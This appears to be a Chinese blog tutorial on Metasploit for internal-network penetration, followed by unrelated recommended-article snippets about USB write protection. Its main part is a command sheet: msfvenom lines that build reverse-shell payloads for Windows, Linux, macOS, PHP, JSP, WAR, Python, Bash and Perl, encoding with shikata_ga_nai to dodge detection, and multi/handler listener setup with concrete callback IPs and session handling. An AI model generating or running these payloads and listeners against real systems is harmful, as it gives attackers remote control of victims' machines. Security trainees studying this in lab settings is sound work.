metasploit内网篇之功能程序(二)

最新推荐文章于 2025-03-24 18:52:13 发布
最新推荐文章于 2025-03-24 18:52:13 发布
阅读量283 收藏 2
点赞数 5
分类专栏: 内网渗透 文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_78851087/article/details/146247895
版权

msfvenom (攻击载荷生成和编码器)

主要参数:-p payload-e 编码方式-i 编码次数-b 在生成的程序中避免出现的值LHOST,LPORT 监听 上线的主机IP和端口-f exe 生成EXE格式使用msfvenom -l 可以查看可以利用payloadmsfvenom -l | grep windows | grep x64 | grep tcp 选择payload

2.1 生成可执行文件

Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 
Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 
Port to Connect On> -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to 
Connect On> -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port 
to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> 
shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your 
Port to Connect On> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port 
to Connect On> -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port 
to Connect On> -f war > shell.war
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to 
Connect On> -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to 
Connect On> -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to 
Connect On> -f raw > shell.pl

我们常用的就是windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe > shell.exe

然后我们把它放入12server4

2.2监听

set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false   让connection保持连接(即使一个连接退出,仍然保持listening状态)
exploit -j –z -j(作为job开始运行)和-z(不立即进行session交换--也即是自动后台运行)
12345

然后我们呢要开启监听

也可以在启动的时候监听

msfconsole -x "use exploit/multi/handler; set payload 
windows/meterpreter/reverse_http; set lhost 127.0.0.1; set lport 1234; exploit -
j; "

高级选项

set PrependMigrate true 自动添加新进程

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 
'\x00' LHOST=172.16.0.4 LPORT=443 -f exe > abc.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.0.4 LPORT=443 -f exe 
> abc.exe

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options
msf exploit(handler) > set LHOST 172.16.0.4
msf exploit(handler) > set ExitOnSession false
set ExitOnSession false   让connection保持连接(即使一个连接退出,仍然保持listening状态)
msf exploit(handler) > exploit -j -z  
-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
msf exploit(handler) > jobs 查看后台攻击任务 
msf exploit(handler) > kill <id> 停止某后台攻击任务 
msf exploit(handler) > sessions -l (查看会话)

这里哦我们运行了两次 所以有两个session

backgroup 放置后台
msf exploit(handler) > sessions 1   选择会话
msf exploit(handler) > sessions -k 1   结束会话

然后我们可以结束会话

这样就只有一个了

Ctrl+z 把会话放到后台
exit 结束会话

我们进入会话

然后输入ctrl +z

我们输入exit 会话2也就消失了

u无法读出显示计算机被锁定,U写保护在本电脑,但在别的电脑又可以写入怎么解除...
weixin_30293523的博客
07-05 5739
不知道大家有没有遇到过,U在自己的电脑上提示写保护,不能写入数据,只能读取,但把U插其他电脑又可以读写数据。其实这种情况一般都可以排除U本身的问题,问题的关键在你自己的电脑系统上面,如果你直接重装系统那么就不用看了,下面就教大家如何解决系统导致的U写保护怎么解除的问题,在不重装的情况下。方法一、修改注册表的方式来解除写保护“Win+R”组合键后输入“regedit”进入注册表编辑器,(也...
电脑安装USB写入保护功能杜绝U传染病毒
htwx9527的博客
03-16 1306
U是传播病毒的主要渠道,其中最容易“中奖”的就是。它会伪装成手动运行文件,当把U插在笔记本上时,笔记本都会被感染,这样来来常常,周围笔记本的硬碟以及联通设备统统落入的魔掌中。下边我搜集整理的硬中毒后文件夹被病毒隐藏了怎样办,欢迎阅读!
u写保护
wjp2417的专栏
11-09 912
U写保护无法写入文件的解决办法 这几天总是有网友说“U写保护,不能写入文件”。总结以前U出现的一些故障,具体如下: 一、查看U上面的写保护开关是否打开,该开关与过去使用的软原理一样。 二、查看该U的根目录下的文件数目是否以达到最大值,通常格式的应256个。 三、在“我的电脑”上点右键-->属性-->硬件-->设备管理器-->通用串行总线控制器,查看该项中的项目是否全部正常,
U插上却没权限?一招教你秒解信创系统读写难题!
最新发布
鹏大圣运维
03-24 1044
Hello,大家好啊!m::rwx 中的 “m” 指的是 ACL 的掩码 (mask),它决定了前面设置的用户或用户组权限的最大权限值,如果 mask 被限制在 r-x,则即使给了特定用户 rwx,实际生效的也只能到 r-x。将 U 插上后(或者已经插好),再次尝试在 /media/pdsyw/ 目录下进行读写操作,如果成功,则说明权限已生效。pdsyw@pdsyw1024:~/桌面$ sudo setfacl -m u:pdsyw:rwx /media/pdsyw/
计算机文件不能复制到u,大文件无法复制到u里解决方法
热门推荐
weixin_33957382的博客
07-26 1万+
想将一个大文件(大于4G)复制到U里时,系统会提示文件过大,不支持拷贝的情况。估计这阻碍了很多人想拷贝高清电影或者游戏文件的计划。别担心,下面“装机之家”就教大家一招儿彻底解决这个烦人的问题!1、无法复制大文件的原因这是你U文件系统的问题。一般U默认为FAT文件系统,它无法支持超过4GB以上的单个文件,而NTFS文件系统的限制高达2TB。2、解除U复制文件大小限制(1)将U连接电脑,注意...
计算机无法为u保存所有数据,U不能写入数据怎么办
weixin_39600447的博客
07-09 1285
U不能写入数据怎么办U不能写入数据是怎么一回事呢?遇到这种情况我们该怎么办?下面是聚优经验网小编给大家收集整理的U不能写入数据怎么办,欢迎阅读。U不能写入数据,提供两种解决办法:1、修改注册表:开始运行,输入regedit,打开注册表HKEY_LOCAL_MACHINE-SYSTEM-Current-ControlSet-Control-Storage-Device-Policies,若没...
win10计算机无法复制文件,Windows10系统下文件无法复制到u怎么解决?
weixin_29463881的博客
07-04 2158
u是大家常用的移动存储设备之一,我们可以通过u,将文件电脑转移到u,或从u转移到电脑,u起到一个桥梁的作用。但是,最近一位用户在操作Windows10系统的过程中,出现文件无法复制到u的情况,此时系统会提示磁写保护,碰到这种问题该如何解决呢?Windows10系统下文件无法复制到u的解决方法:1、按Win+R键,打开运行,输入regedit,回车进入注册表编辑器;2、展开至:H...
html移动端插入mov_看这里!移动硬无法拷贝或删除文件的最佳解决方案
weixin_39568233的博客
10-23 841
在mac上使用移动硬/U时你们有遇到过这种情况吗?移动硬/U插入Mac,可以打开里面的文件,却不能拷贝/删除/新建文件夹。怎么解决呢?下面小编为大家详细介绍一下如何解决这个问题。首先,出现这种情况很有可能是因为你的硬是 NTFS 格式。那怎样才可以在硬上随意拷贝/删除/新建文件夹呢?方法一:使用磁工具将硬格式改成MacOS扩展式但是,这种抹操作会将数据完全抹除;并且,这个硬在W...
Linux系统U自动识别与文件拷贝
02-24
本文将详细解析"Linux系统U自动识别与文件拷贝"的相关知识点,通过源码udisk.c和udisk.h来探讨实现这一功能的方法。 首先,Linux系统中的U被识别为一个设备节点,通常位于`/dev/sd*`目录下,如`/dev/sdb1`。...
任务栏绿盾删除神器 ,解决U不能拷贝
03-24
标题中的“任务栏绿盾删除神器”指的是针对名为“绿盾”的一款软件的解除工具,通常这类软件用于企业环境中,以限制员工对电脑或U的使用,防止敏感信息外泄。绿盾可能会阻止U拷贝功能,以保护公司数据安全。...
怎样禁止通过u复制电脑文件、限制把电脑文件复制到U方法
02-12
例如,大势至USB端口控制软件提供了一种解决方案,它可以限制U写入权限,仅允许从U电脑拷贝文件,而从电脑向U拷贝时则需要输入管理员设定的密码。这种方法既能确保商业机密的安全,又不妨碍U作为数据...
外接移动硬/U无法读写解决方案
北冥同学的成长记录笔记
11-02 3149
问题描述:将常用的便携移动硬/U插入终端,终端无法读取移动硬/U,并出现“无法访问 介质受写入保护”或“拒绝访问”等报错信息。
单位电脑禁用u_组策略禁止u_注册表禁止u
天生的博客
01-16 2503
在日常工作中,U可以为工作带来方便,但在信息安全管理中尤其是对数据安全管理要求比较高的单位,为了防止重要数据泄露我们需要禁止U或移动存储设备,为此U或移动存储设备也带来了不便。 关于电脑禁用U有哪几种方法呢? 具体有很多方法,例如使用软件,但这类方法稳定性没这么高,我们下面介绍通过系统的组策略禁止U和注册表禁止U这两种方法。 以下方法以win7系统为例 第一种方法:组策略禁止U 第一...
u写保护怎么解除?u写保护怎么去掉?
qq_39571617的博客
10-12 3259
U写保护可能是有意的设置,也可能是无疑的操作。权限问题:有时候,磁写保护是由操作系统的设置或注册表项开启的,比如,在Windows系统中,注册表的某些设置可以阻止写入操作。U上的文件系统损坏了:文件系统是负责存储和管理数据的核心部分,如果文件系统受到损坏,比如,不正确地将U移除、突然断电或是文件写入识别等,操作系统有可能会自动将U设置写保护状态,防止进一步的损坏。最后,如果U存在比较严重的硬件故障,那么解除写保护的各种尝试可能都没有效果,这种情况,可以联系U的售后进行维修。
WIN11U、外部存储设备提示“目标文件夹访问被拒绝”解决了!!
weixin_50032001的博客
08-22 8567
WIN11"目标文件夹访问被拒绝""无法枚举容器中的对象,访问被拒绝"
Win11磁写保护怎么解除
xitongzhijianet的博客
05-09 2737
  当我们的磁出现被写保护的情况时,那就无法在磁写入任何数据,同样也无法删除数据。我们要如何才能对磁数据进行修改呢?那就解除写保护就可以了。下面我们就来看看Win11磁写保护解除方法。 Win11 22000.613 X64 专业精简版下载_微软Win11官方最新正式版下载 - 系统之家 最新电脑系统Win11办公版下载_Win11办公专用电脑系统下载 - 系统之家   Win11磁写保护解除方法:   1、Windows 将根据你所输入的名称,为你打开相应的程序、文件夹、文档
C/C++ 在Linux系统中,解决无法往U创建文件写入数据的问题
cpp_learner的博客
06-20 1824
C/C++在Linux环境下无法往U写入文件,使用sync()解决这个问题!
U禁止写入/SD卡被禁用怎么解除
菩提本无树的博客
12-28 5792
如何解除sd卡/U禁止写入
怎样处理Win7系统插入所有U都只能读取,无法写入
sharkill的专栏
11-05 1万+
电脑安装的是Win7系统,插入所有的U都这能读取,无法写入,说是读写保护,请去掉读写保护,但是U插入别的机子好好的,该怎么处理? Win7系统中拒绝写入权限防范U病毒传播       U已经成为除了网络之外传播数量最大的病毒和恶意程序传播途径。在不经意的一插之间,病毒或者恶意程序就已经感染了您的计算机。       自Windows Vista 开始,系统就已经可以限制可移动磁
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值